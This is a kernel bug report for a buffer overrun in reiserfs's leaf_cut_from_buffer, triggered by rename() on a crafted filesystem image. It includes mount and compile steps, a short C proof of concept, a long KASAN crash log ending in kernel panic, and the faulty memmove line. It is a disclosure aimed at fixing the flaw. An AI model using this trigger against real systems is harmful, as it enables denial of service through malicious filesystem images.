https://bugzilla.kernel.org/show_bug.cgi?id=200351 Bug ID: 200351 Summary: buffer overrun in leaf_cut_entries() when rename() file on a reiserfs filesystem Product: File System Version: 2.5 Kernel Version: 4.18 Hardware: All OS: Linux Tree: Mainline Status: NEW Severity: normal Priority: P1 Component: ReiserFS Assignee: reiserfs-devel@xxxxxxxxxxxxxxx Reporter: wen.xu@xxxxxxxxxx Regression: No Created attachment 277005 --> https://bugzilla.kernel.org/attachment.cgi?id=277005&action=edit The (compressed) crafted image which causes crash - Reproduce (4.18) # mkdir mnt # mount -t reiserfs -o acl,user_xattr 33.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *foo_bar_baz; char *foo_baz; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint); err = asprintf(&foo_baz, "%s/foo/baz", mpoint); rename(foo_bar_baz, foo_baz); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 389.198227] ================================================================== [ 389.199818] BUG: KASAN: out-of-bounds in leaf_cut_from_buffer+0x2bc/0x790 [ 389.201193] Read of size 18446744073709491481 at addr ffff8801cd7ee89b by task poc/1425 [ 389.202797] [ 389.203829] [ 389.204161] The buggy address belongs to the page: [ 389.205137] page:ffffea000735fb80 count:1 mapcount:1 mapping:ffff8801f0a59b61 index:0x5626422f9 [ 389.206894] flags: 0x2ffff0000040068(uptodate|lru|active|swapbacked) [ 389.208196] raw: 02ffff0000040068 ffffea000735fb48 ffffea0007340388 ffff8801f0a59b61 [ 389.209762] raw: 00000005626422f9 0000000000000000 0000000100000000 ffff8801dfa3e600 [ 389.211336] page dumped because: kasan: bad access detected [ 389.212468] page->mem_cgroup:ffff8801dfa3e600 [ 389.213355] [ 389.213678] Memory state around the buggy address: [ 389.214651] ffff8801cd7ee780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 389.216122] ffff8801cd7ee800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 389.217570] >ffff8801cd7ee880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 389.245114] ^ [ 389.245988] ffff8801cd7ee900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 389.247453] ffff8801cd7ee980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 389.248901] ================================================================== [ 389.365425] general protection fault: 0000 [#1] SMP KASAN PTI [ 389.366633] CPU: 1 PID: 1426 Comm: kworker/u4:1 Tainted: G B 4.18.0-rc1+ #8 [ 389.368332] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 389.370300] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0 [ 389.371279] Code: 01 00 00 41 8b 46 20 48 8d 4a 01 49 8b 3e 49 8b 1c 04 4c 89 e0 65 48 0f c7 0f 0f 94 c0 84 c0 74 bb 48 85 db 74 0b 41 8b 46 20 <48> 8b 04 03 0f 18 08 41 f7 c5 00 80 00 00 0f 85 10 01 00 00 8b 15 [ 389.375201] RSP: 0018:ffff8801ef0ef588 EFLAGS: 00010286 [ 389.376267] RAX: 0000000000000070 RBX: ffea000733e840ff RCX: 0000000000000050 [ 389.377707] RDX: 000000000000004f RSI: 0000000000608040 RDI: 0000000000032f10 [ 389.379167] RBP: ffff8801ef0ef5b8 R08: ffff8801f6f32f10 R09: ffffed003bcd2309 [ 389.380614] R10: 0000000000000001 R11: ffffed003bcd2308 R12: ffff8801d06f9790 [ 389.382059] R13: 0000000000608040 R14: ffff8801e678fdc0 R15: ffff8801e678fdc0 [ 389.383518] FS: 0000000000000000(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 389.385158] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 389.386349] CR2: 0000000000000000 CR3: 00000001e0e3c000 CR4: 00000000000006e0 [ 389.387832] Call Trace: [ 389.388393] ? jbd2_journal_add_journal_head+0x95/0x1d0 [ 389.389467] jbd2_journal_add_journal_head+0x95/0x1d0 [ 389.390506] jbd2_journal_get_write_access+0x4f/0x80 [ 389.391553] __ext4_journal_get_write_access+0x3b/0x80 [ 389.392614] ext4_reserve_inode_write+0xd9/0x110 [ 389.393566] ext4_mark_inode_dirty+0xfb/0x3d0 [ 389.394468] ? ext4_expand_extra_isize+0x2e0/0x2e0 [ 389.395544] ? kmem_cache_alloc+0x17c/0x1e0 [ 389.396415] ? __ext4_journal_start_sb+0x89/0x180 [ 389.397424] ext4_dirty_inode+0x51/0x70 [ 389.398241] __mark_inode_dirty+0x220/0x4f0 [ 389.399115] ? timespec64_trunc+0x90/0x90 [ 389.399944] generic_update_time+0xd7/0x170 [ 389.400807] touch_atime+0x164/0x190 [ 389.401546] ? __atime_needs_update+0x360/0x360 [ 389.402493] generic_file_read_iter+0xe28/0xff0 [ 389.416224] ? filemap_range_has_page+0x170/0x170 [ 389.417226] ? aa_path_link+0x200/0x200 [ 389.418029] ? page_cache_tree_insert+0x1d0/0x1d0 [ 389.418996] ? ext4_xattr_ibody_get+0x320/0x320 [ 389.419936] ext4_file_read_iter+0xa0/0x170 [ 389.420807] __vfs_read+0x283/0x400 [ 389.421537] ? __x64_sys_copy_file_range+0x380/0x380 [ 389.422562] ? __fsnotify_inode_delete+0x20/0x20 [ 389.423524] ? rw_verify_area+0x78/0x140 [ 389.424330] vfs_read+0xbf/0x1b0 [ 389.425007] kernel_read+0x6e/0xa0 [ 389.425718] prepare_binprm+0x1d5/0x390 [ 389.426515] ? install_exec_creds+0xc0/0xc0 [ 389.427414] ? _cond_resched+0x1a/0x50 [ 389.428202] __do_execve_file.isra.34+0x961/0xe50 [ 389.429181] ? prepare_bprm_creds+0xa0/0xa0 [ 389.430056] do_execve+0x25/0x30 [ 389.430761] call_usermodehelper_exec_async+0x25c/0x270 [ 389.431841] ? umh_complete+0x50/0x50 [ 389.432605] ret_from_fork+0x35/0x40 [ 389.433351] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 389.443311] ---[ end trace 2e85051acb5f6dc1 ]--- [ 389.444309] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0 [ 389.445274] Code: 01 00 00 41 8b 46 20 48 8d 4a 01 49 8b 3e 49 8b 1c 04 4c 89 e0 65 48 0f c7 0f 0f 94 c0 84 c0 74 bb 48 85 db 74 0b 41 8b 46 20 <48> 8b 04 03 0f 18 08 41 f7 c5 00 80 00 00 0f 85 10 01 00 00 8b 15 [ 389.449130] RSP: 0018:ffff8801ef0ef588 EFLAGS: 00010286 [ 389.450218] RAX: 0000000000000070 RBX: ffea000733e840ff RCX: 0000000000000050 [ 389.451671] RDX: 000000000000004f RSI: 0000000000608040 RDI: 0000000000032f10 [ 389.453127] RBP: ffff8801ef0ef5b8 R08: ffff8801f6f32f10 R09: ffffed003bcd2309 [ 389.454563] R10: 0000000000000001 R11: ffffed003bcd2308 R12: ffff8801d06f9790 [ 389.456063] R13: 0000000000608040 R14: ffff8801e678fdc0 R15: ffff8801e678fdc0 [ 389.457512] FS: 0000000000000000(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 389.459156] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 389.460352] CR2: 0000000000000000 CR3: 00000001e0e3c000 CR4: 00000000000006e0 [ 389.462977] systemd[1]: segfault at f827c57e00 ip 000000f827c57e00 sp 00007ffc63794bb0 error 14 in systemd[562641dc0000+15c000] [ 389.465366] Code: Bad RIP value. [ 389.466139] systemd[1]: segfault at fffffffffffffe40 ip 0000562641e883ba sp 00007ffc63793c50 error 5 in systemd[562641dc0000+15c000] [ 389.468593] Code: 25 28 00 00 00 48 89 84 24 28 08 00 00 31 c0 48 89 54 24 08 89 4c 24 18 e8 03 9a f5 ff 85 db 4c 8b bc 24 70 08 00 00 48 89 c5 <44> 8b 10 78 51 44 89 e0 83 e0 07 3b 05 a9 8d 0b 00 0f 8e af 00 00 [ 389.473123] systemd-cgroups[1427]: segfault at a590 ip 000000000000a590 sp 00007ffc4dbb33f0 error 14 [ 389.474988] Code: Bad RIP value. [ 389.475885] systemd[1]: segfault at fffffffffffffe40 ip 0000562641e883ba sp 00007ffc63792d10 error 5 in systemd[562641dc0000+15c000] [ 389.478367] Code: 25 28 00 00 00 48 89 84 24 28 08 00 00 31 c0 48 89 54 24 08 89 4c 24 18 e8 03 9a f5 ff 85 db 4c 8b bc 24 70 08 00 00 48 89 c5 <44> 8b 10 78 51 44 89 e0 83 e0 07 3b 05 a9 8d 0b 00 0f 8e af 00 00 [ 389.482352] systemd[1]: segfault at fffffffffffffe40 ip 0000562641e883ba sp 00007ffc63791dd0 error 5 in systemd[562641dc0000+15c000] [ 389.484840] Code: ff ff 4c 39 e8 72 50 48 8b 83 80 01 00 00 49 63 d5 4c 0f a3 e8 73 e2 41 83 fd 25 0f 87 d3 03 00 00 48 8d 05 31 44 0a 00 48 8b <0c> d0 48 85 c9 49 0f 44 ce 48 8d 15 55 a9 02 00 be 01 00 00 00 48 [ 389.486493] BUG: unable to handle kernel paging request at ffff8801dd400000 [ 389.488762] systemd[1]: segfault at b8 ip 0000562641e8849d sp 00007ffc637917e8 error 4 [ 389.490145] PGD a120b067 [ 389.490157] in systemd[562641dc0000+15c000] [ 389.491750] P4D a120b067 [ 389.493178] PUD a1212067 [ 389.493724] Code: [ 389.493726] PMD 1f1e96063 PTE 80000001dd400061 [ 389.494271] 00 [ 389.495607] 00 4c 8d [ 389.495985] Oops: 0003 [#2] SMP KASAN PTI [ 389.495993] CPU: 0 PID: 1425 Comm: poc Tainted: G B D 4.18.0-rc1+ #8 [ 389.496482] 74 [ 389.497284] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 389.498781] 24 [ 389.499173] RIP: 0010:__memmove+0x5b/0x1a0 [ 389.501068] 10 [ 389.501424] Code: [ 389.502258] 48 [ 389.502629] 38 [ 389.503062] 8d [ 389.503437] fe [ 389.503808] 15 [ 389.504177] 74 3b 48 83 ea 20 48 83 ea 20 4c 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b [ 389.504573] 92 [ 389.504945] 46 [ 389.506445] 8d [ 389.506815] 18 [ 389.507195] 02 [ 389.507569] 48 [ 389.507943] 00 [ 389.508312] 8d 76 20 4c 89 1f 4c 89 57 08 4c 89 4f 10 <4c> 89 47 18 48 8d 7f 20 [ 389.508710] 31 [ 389.509083] 73 [ 389.510563] c0 [ 389.510934] d4 [ 389.547271] be [ 389.547588] 48 [ 389.547968] 01 [ 389.548333] 83 c2 20 e9 a2 00 00 00 66 90 48 [ 389.548344] RSP: 0018:ffff8801f080ece0 EFLAGS: 00010282 [ 389.548350] RAX: ffff8801cd7dfd84 RBX: ffffffffffff1519 RCX: ffffffffa54f957c [ 389.548355] RDX: fffffffff03d1279 RSI: ffff8801dd40eb1b RDI: ffff8801dd3fffe4 [ 389.548731] 00 [ 389.549108] RBP: ffff8801f080ed00 R08: 0002400000000000 R09: 0000000000000000 [ 389.549997] 00 [ 389.551070] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8801cd7dfd84 [ 389.551073] R13: ffff8801cd7ee89b R14: 0000000000000001 R15: ffff8801ea989370 [ 389.551077] FS: 00007fc79e1eb700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 389.551109] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 389.551113] CR2: ffff8801dd400000 CR3: 00000001e8062000 CR4: 00000000000006f0 [ 389.551123] Call Trace: [ 389.552595] 00 [ 389.554026] ? memmove+0x45/0x50 [ 389.554381] 4c [ 389.555837] leaf_cut_from_buffer+0x2bc/0x790 [ 389.556222] 89 [ 389.557639] balance_leaf+0x2913/0x4800 [ 389.559114] f7 [ 389.560711] ? wake_bit_function+0x90/0x90 [ 389.560719] ? get_neighbors+0x20e/0x450 [ 389.561878] e8 [ 389.563319] ? fix_nodes+0x1ea3/0x35c0 [ 389.563825] 99 [ 389.564199] ? replace_key+0xf0/0xf0 [ 389.564205] do_balance+0x219/0x430 [ 389.564209] ? do_balance+0x219/0x430 [ 389.564216] ? get_right_neighbor_position+0x80/0x80 [ 389.564877] ae [ 389.565251] ? create_virtual_node+0x9d0/0x9d0 [ 389.566129] f4 [ 389.566503] ? comp_items+0xa0/0xa0 [ 389.567292] ff [ 389.567672] ? __asan_loadN+0xf/0x20 [ 389.568515] 85 [ 389.569300] reiserfs_cut_from_item+0x6b7/0xbc0 [ 389.569668] c0 [ 389.570434] ? reiserfs_delete_solid_item+0x540/0x540 [ 389.570799] 0f [ 389.571547] ? search_by_key+0x1223/0x19d0 [ 389.572277] 88 [ 389.573010] ? pathrelse+0x70/0x70 [ 389.574007] 7b [ 389.574383] ? current_time+0xb3/0x110 [ 389.575292] 03 [ 389.575677] ? kasan_check_write+0x14/0x20 [ 389.576398] 00 [ 389.576761] ? __brelse+0x4f/0x60 [ 389.577486] 00 [ 389.577860] reiserfs_rename+0xc31/0xfc0 [ 389.578769] 4c [ 389.579158] ? reiserfs_create+0x3d0/0x3d0 [ 389.580196] 8b [ 389.580558] ? __asan_loadN+0xf/0x20 [ 389.581386] 6c [ 389.581763] ? pathrelse+0x70/0x70 [ 389.582450] 24 [ 389.582843] ? unwind_get_return_address+0x36/0x50 [ 389.583685] 10 [ 389.584076] ? __save_stack_trace+0x92/0x100 [ 389.584084] ? __asan_loadN+0xf/0x20 [ 389.584916] <8b> [ 389.585293] ? search_by_entry_key+0x20c/0x4b0 [ 389.585964] 83 [ 389.586340] ? __asan_loadN+0xf/0x20 [ 389.587141] b8 [ 389.587537] ? lockref_put_or_lock+0x160/0x160 [ 389.588362] 00 [ 389.588725] ? kasan_check_write+0x14/0x20 [ 389.589453] 00 [ 389.589833] ? blk_mq_debugfs_unregister_sched_hctx+0x50/0x50 [ 389.590521] 00 [ 389.590901] ? _cond_resched+0x1a/0x50 [ 389.591875] 25 [ 389.592252] vfs_rename+0xa70/0xda0 [ 389.592257] ? vfs_rename+0xa70/0xda0 [ 389.592262] ? path_mountpoint+0x940/0x940 [ 389.592269] ? kasan_check_write+0x14/0x20 [ 389.593132] ff [ 389.593883] ? security_path_rename+0xcb/0x130 [ 389.594269] 1f [ 389.595185] do_renameat2+0x7d2/0x860 [ 389.595553] 00 [ 389.596291] ? user_path_create+0x40/0x40 [ 389.596297] ? kasan_check_write+0x14/0x20 [ 389.596303] ? lockref_put_return+0xd0/0x140 [ 389.596310] ? lockref_get_or_lock+0x160/0x160 [ 389.596683] 00 [ 389.597589] ? kasan_check_read+0x11/0x20 [ 389.597955] 4d [ 389.598791] ? mntput_no_expire+0x35/0x280 [ 389.599165] 85 [ 389.600322] ? mntput+0x36/0x50 [ 389.600330] ? __fput+0x293/0x380 [ 389.600349] ? task_work_run+0x4d/0xf0 [ 389.600711] ed [ 389.601482] ? mem_cgroup_handle_over_high+0x21/0xe0 [ 389.601847] 4d [ 389.602565] __x64_sys_rename+0x3b/0x50 [ 389.603317] 89 [ 389.604169] do_syscall_64+0x78/0x170 [ 389.604178] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 389.605011] e8 [ 389.605411] RIP: 0033:0x7fc79dc71367 [ 389.606285] 0f [ 389.606658] Code: [ 389.607417] 84 [ 389.607792] 75 [ 389.608628] 6a [ 389.609446] 12 [ 389.610317] 03 [ 389.611228] 48 [ 389.611602] 00 [ 389.612417] 89 df e8 a9 d7 08 00 85 c0 0f 95 c0 0f b6 c0 f7 d8 5b c3 66 2e 0f [ 389.613646] 1f [ 389.614112] traps: iscsid[1089] general protection ip:7f404b01c738 sp:7ffeec945b78 error:0 [ 389.614660] 84 [ 389.615399] in libc-2.23.so[7f404af21000+1c0000] [ 389.616133] 00 00 00 00 00 0f 1f 00 b8 52 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 01 8b 35 00 f7 d8 [ 389.617528] 64 [ 389.619076] systemd[1]: segfault at b8 ip 0000562641e8849d sp 00007ffc637911e8 error 4 [ 389.619809] 89 [ 389.652634] in systemd[562641dc0000+15c000] [ 389.653244] 01 [ 389.654028] 48 [ 389.654036] RSP: 002b:00007fff12bae1d8 EFLAGS: 00000206 [ 389.654422] Code: [ 389.654792] ORIG_RAX: 0000000000000052 [ 389.655161] 00 [ 389.655530] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc79dc71367 [ 389.655902] 00 [ 389.656271] RDX: 0000000000abc0a0 RSI: 0000000000abc0a0 RDI: 0000000000abc080 [ 389.656273] RBP: 00007fff12bae340 R08: 0000000000000003 R09: 0000000000000000 [ 389.656276] R10: 0000000000000640 R11: 0000000000000206 R12: 0000000000400c20 [ 389.656278] R13: 00007fff12bae440 R14: 0000000000000000 R15: 0000000000000000 [ 389.656287] Modules linked in: snd_hda_codec_generic [ 389.656687] 4c [ 389.658126] snd_hda_intel [ 389.658521] 8d [ 389.660183] snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm [ 389.660609] 74 [ 389.661562] ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi [ 389.663726] 24 [ 389.664102] raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too [ 389.665752] 10 [ 389.666128] qxl [ 389.667020] 48 [ 389.667410] drm_kms_helper [ 389.667795] 8d [ 389.668862] crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd [ 389.669326] 15 [ 389.670117] glue_helper [ 389.670501] 92 [ 389.671966] 8139cp [ 389.672373] 8d [ 389.673802] mii [ 389.675295] 02 [ 389.676731] pata_acpi floppy [ 389.676741] CR2: ffff8801dd400000 [ 389.676747] ---[ end trace 2e85051acb5f6dc2 ]--- [ 389.676763] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0 [ 389.676768] Code: [ 389.678235] 00 [ 389.679260] 01 [ 389.679643] 31 [ 389.680206] 00 00 41 8b 46 20 48 8d 4a 01 49 8b 3e 49 8b 1c 04 4c 89 e0 65 [ 389.680620] c0 [ 389.682806] 48 0f c7 0f 0f 94 c0 84 c0 74 bb 48 85 db 74 0b 41 8b 46 20 <48> 8b 04 03 0f 18 08 41 f7 c5 00 80 00 00 0f 85 10 01 00 00 8b 15 [ 389.683257] be [ 389.684731] RSP: 0018:ffff8801ef0ef588 EFLAGS: 00010286 [ 389.684736] RAX: 0000000000000070 RBX: ffea000733e840ff RCX: 0000000000000050 [ 389.684738] RDX: 000000000000004f RSI: 0000000000608040 RDI: 0000000000032f10 [ 389.684741] RBP: ffff8801ef0ef5b8 R08: ffff8801f6f32f10 R09: ffffed003bcd2309 [ 389.684744] R10: 0000000000000001 R11: ffffed003bcd2308 R12: ffff8801d06f9790 [ 389.684747] R13: 0000000000608040 R14: ffff8801e678fdc0 R15: ffff8801e678fdc0 [ 389.684754] FS: 00007fc79e1eb700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 389.685144] 01 [ 389.687392] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 389.687398] CR2: ffff8801dd400000 CR3: 00000001e8062000 CR4: 00000000000006f0 [ 389.687786] 00 [ 389.692065] general protection fault: 0000 [#3] SMP KASAN PTI [ 389.692761] 00 [ 389.693357] CPU: 0 PID: 1425 Comm: poc Tainted: G B D 4.18.0-rc1+ #8 [ 389.693714] 00 [ 389.694164] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 389.694530] 4c [ 389.694940] RIP: 0010:__x86_indirect_thunk_rdx+0x10/0x20 [ 389.695308] 89 [ 389.695925] Code: [ 389.696630] f7 [ 389.697555] 90 [ 389.698496] e8 [ 389.698924] 0f [ 389.699300] 99 [ 389.699679] ae [ 389.700066] ae [ 389.701460] e8 [ 389.701829] f4 [ 389.704383] eb f9 48 89 0c 24 c3 0f 1f 44 00 00 66 2e 0f 1f 84 00 00 00 00 00 e8 [ 389.704777] ff [ 389.705847] 07 [ 389.707261] 85 [ 389.708706] 00 00 00 f3 90 0f ae e8 eb f9 48 89 14 24 <c3> 0f 1f 44 00 00 66 2e 0f [ 389.710147] c0 [ 389.711599] 1f [ 389.713041] 0f [ 389.714663] 84 [ 389.715048] 88 [ 389.716220] 00 00 00 00 00 e8 07 00 00 00 f3 [ 389.716230] RSP: 0018:ffff8801f6e07e48 EFLAGS: 00010286 [ 389.716235] RAX: 0000000000000000 RBX: ffff8801d07158d8 RCX: ffffffffa518aa40 [ 389.716297] RDX: ff8801d07243f0ff RSI: ffff8801f6e07eb8 RDI: ffff8801d07158d8 [ 389.717671] 7b [ 389.718076] RBP: ffff8801f6e07f40 R08: 0000000000000246 R09: fffffbfff4e22f59 [ 389.719235] 03 [ 389.719620] R10: 0000000000000001 R11: fffffbfff4e22f58 R12: ffff8801de0c0000 [ 389.719628] R13: ffff8801f6e07f18 R14: ffff8801f6e07eb8 R15: 000000000000000a [ 389.721133] 00 [ 389.721504] FS: 0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 389.723403] 00 [ 389.723787] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 389.723791] CR2: ffff8801dd400000 CR3: 00000000a0026000 CR4: 00000000000006f0 [ 389.723797] Call Trace: [ 389.724894] 4c [ 389.725264] <IRQ> [ 389.725691] 8b [ 389.726102] ? rcu_process_callbacks+0x2cb/0x850 [ 389.726444] 6c 24 10 <8b> 83 b8 00 00 00 25 ff 1f 00 00 4d 85 ed 4d 89 e8 0f 84 6a 03 00 [ 389.767763] ? note_gp_changes+0xe0/0xe0 [ 389.768589] ? run_rebalance_domains+0x11c/0x170 [ 389.769558] __do_softirq+0x11d/0x341 [ 389.770344] irq_exit+0xe9/0xf0 [ 389.771015] smp_apic_timer_interrupt+0x8f/0x1b0 [ 389.771990] apic_timer_interrupt+0xf/0x20 [ 389.772844] </IRQ> [ 389.773302] RIP: 0010:__asan_load4+0x0/0x80 [ 389.774178] Code: 48 89 fe 48 ba 00 00 00 00 00 fc ff df 48 c1 ee 03 80 3c 16 00 75 d8 48 c1 e8 03 80 3c 10 00 75 c7 5d c3 0f 1f 80 00 00 00 00 <55> 48 b8 ff ff ff ff ff 7f ff ff 48 39 c7 48 89 e5 48 8b 4d 08 76 [ 389.778057] RSP: 0018:ffff8801f080fa18 EFLAGS: 00000246 ORIG_RAX: ffffffffffffff13 [ 389.779617] RAX: 0000000080000000 RBX: ffff8801d0731570 RCX: ffffffffa6319b66 [ 389.781075] RDX: dffffc0000000000 RSI: 0000000000000008 RDI: ffff8801de0c0064 [ 389.782540] RBP: ffff8801f080fbc0 R08: ffffed003a0e62af R09: ffffed003a0e62af [ 389.784028] R10: 0000000000000001 R11: ffffed003a0e62ae R12: ffffffff00000001 [ 389.785490] R13: ffff8801d0731570 R14: 0000000100000000 R15: ffff8801de0c0000 [ 389.786963] ? rwsem_down_write_failed+0x536/0x650 [ 389.787969] ? rwsem_down_write_failed+0x549/0x650 [ 389.788964] ? rwsem_down_read_failed+0x280/0x280 [ 389.789942] ? unlock_page_memcg+0x16/0x80 [ 389.790811] ? page_remove_rmap+0x198/0x520 [ 389.791695] ? mark_page_accessed+0x133/0x200 [ 389.792596] ? _cond_resched+0x1a/0x50 [ 389.793384] ? unmap_page_range+0xcd4/0xe50 [ 389.794253] call_rwsem_down_write_failed+0x17/0x30 [ 389.795267] ? call_rwsem_down_write_failed+0x17/0x30 [ 389.796315] ? unlink_file_vma+0x38/0x70 [ 389.797131] down_write+0x2f/0x50 [ 389.797829] unlink_file_vma+0x4b/0x70 [ 389.798612] free_pgtables+0x56/0x1b0 [ 389.799385] exit_mmap+0x146/0x2a0 [ 389.800097] ? __ia32_sys_munmap+0x50/0x50 [ 389.800950] ? kasan_check_read+0x11/0x20 [ 389.801795] ? mm_update_next_owner+0x322/0x380 [ 389.802737] mmput+0x8b/0x1d0 [ 389.803427] do_exit+0x43a/0x1390 [ 389.804126] ? mntput+0x36/0x50 [ 389.804787] ? mm_update_next_owner+0x380/0x380 [ 389.805730] ? task_work_run+0x4d/0xf0 [ 389.806516] ? mem_cgroup_handle_over_high+0x21/0xe0 [ 389.807548] ? __x64_sys_rename+0x3b/0x50 [ 389.808380] rewind_stack_do_exit+0x17/0x20 [ 389.809247] RIP: 0033:0x7fc79dc71367 [ 389.809985] Code: Bad RIP value. [ 389.810671] RSP: 002b:00007fff12bae1d8 EFLAGS: 00000206 ORIG_RAX: 0000000000000052 [ 389.812225] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc79dc71367 [ 389.813683] RDX: 0000000000abc0a0 RSI: 0000000000abc0a0 RDI: 0000000000abc080 [ 389.815206] RBP: 00007fff12bae340 R08: 0000000000000003 R09: 0000000000000000 [ 389.816663] R10: 0000000000000640 R11: 0000000000000206 R12: 0000000000400c20 [ 389.818116] R13: 00007fff12bae440 R14: 0000000000000000 R15: 0000000000000000 [ 389.819939] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 389.829704] ---[ end trace 2e85051acb5f6dc3 ]--- [ 389.830663] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0 [ 389.831642] Code: 01 00 00 41 8b 46 20 48 8d 4a 01 49 8b 3e 49 8b 1c 04 4c 89 e0 65 48 0f c7 0f 0f 94 c0 84 c0 74 bb 48 85 db 74 0b 41 8b 46 20 <48> 8b 04 03 0f 18 08 41 f7 c5 00 80 00 00 0f 85 10 01 00 00 8b 15 [ 389.842495] RSP: 0018:ffff8801ef0ef588 EFLAGS: 00010286 [ 389.843596] RAX: 0000000000000070 RBX: ffea000733e840ff RCX: 0000000000000050 [ 389.845089] RDX: 000000000000004f RSI: 0000000000608040 RDI: 0000000000032f10 [ 389.846555] RBP: ffff8801ef0ef5b8 R08: ffff8801f6f32f10 R09: ffffed003bcd2309 [ 389.848045] R10: 0000000000000001 R11: ffffed003bcd2308 R12: ffff8801d06f9790 [ 389.849545] R13: 0000000000608040 R14: ffff8801e678fdc0 R15: ffff8801e678fdc0 [ 389.851014] FS: 0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 389.852702] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 389.853891] CR2: 00007fc79dc7133d CR3: 00000000a0026000 CR4: 00000000000006f0 [ 389.855361] Kernel panic - not syncing: Fatal exception in interrupt [ 389.930786] Kernel Offset: 0x24000000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff) [ 389.932982] ---[ end Kernel panic - not syncing: Fatal exception in interrupt ]--- - Reason https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/lbalance.c#L1130 /* shift records, those are BEFORE removed entries */ memmove(prev_record - cut_records_len - DEH_SIZE * del_count, prev_record, item + ih_item_len(ih) - prev_record); Here `size` of memmove can be negative which leads to buffer overrun and kernel panic afterwards Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech. -- You are receiving this mail because: You are the assignee for the bug.-- To unsubscribe from this list: send the line "unsubscribe reiserfs-devel" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html
